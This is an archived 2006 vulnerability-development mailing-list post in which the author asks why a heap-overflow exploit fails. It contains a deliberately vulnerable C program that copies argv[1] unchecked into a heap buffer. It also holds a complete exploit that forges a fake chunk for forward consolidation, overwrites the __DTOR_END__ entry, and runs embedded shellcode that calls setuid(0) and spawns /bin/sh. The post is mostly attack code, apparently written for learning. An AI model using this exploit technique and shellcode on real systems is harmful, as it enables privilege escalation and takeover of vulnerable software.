Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

heap overflow foreward consolidation

From: padre () correo ugr es
Date: Sat, 27 May 2006 01:27:26 +0200 (MEST)
Hi, im coding a heap verflow & exploit using foreward consolidation.

I've been days looking at the code,but i didnt see nothing wrong.

Why my xploit do not work?

I think the fake chunk is constructed correctly, the padding is ok, the
size is ok.

Guys,can u tell me if the code is ok?? Maybe I forgotted something
important (dont think so :-P)

Thanks in advance!!

-[ DTOR INFO]-----------------------------------------------

mooo@localhost:~$ nm a | grep DTOR
080497e4 d __DTOR_END__
080497e0 d __DTOR_LIST__

------------------------------------------------------------
THIS IS THE BUGGY CODE
------------------------------------------------------------
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

int main (int argc, char **argv)
{

char *p,*p2;

p = (char*)malloc(250);
p2 = (char*)malloc(250);
long *dtor_list = 0x080497e0;
long *dtor_end = 0x080497e4;

if (p && p2)
        printf("OK\n\n");
        else exit(-1);

printf ("p1 @ 0x%08x \n", p);
printf ("p2 @ 0x%08x \n", p2);

strcpy(p,argv[1]);

free(p);

printf ("dtors_list @ 0x%08x = 0x%08x \n", dtor_list, *dtor_list);
printf ("dtors_end @ 0x%08x = 0x%08x \n ", dtor_end, *dtor_end);

return 0;
}

----------------------------------------------------------
THIS IS THE EXPLOIT
----------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define TRASH 0xffffffff
#define FLAG 0x1

int SIZE=(256+16);

int main (int argc, char **argv){

char buffer[SIZE+1];

char sc[] =
        "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
        "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
        "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
        "\x68";

char *environ[]={sc,NULL};

long shellcode_addr = 0xbffffffa - strlen(sc) - strlen("./a");
long dtor_addr=0x080497e4;

memset (buffer,'A',SIZE);

*(int*)&buffer[(SIZE-16)] = (TRASH & ~FLAG);
*(int*)&buffer[(SIZE-12)] = -4;
*(int*)&buffer[(SIZE-8)] = (dtor_addr - 12);
*(int*)&buffer[(SIZE-4)] = (shellcode_addr + 8);

*(int*)&buffer[SIZE]='\0';

printf("-| Shellcode (%d bytes) @ 0x%08x\n",strlen(sc),shellcode_addr);
printf("-|-----------------------------------\n");
printf("-| DTOR_END @ 0x%08x\n", dtor_addr);

if ( execle("./a","a",buffer,environ) < 0)
        {
        perror ("execle ");
        }

        printf("something wrong :-S \n");

return 0;
}

--------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: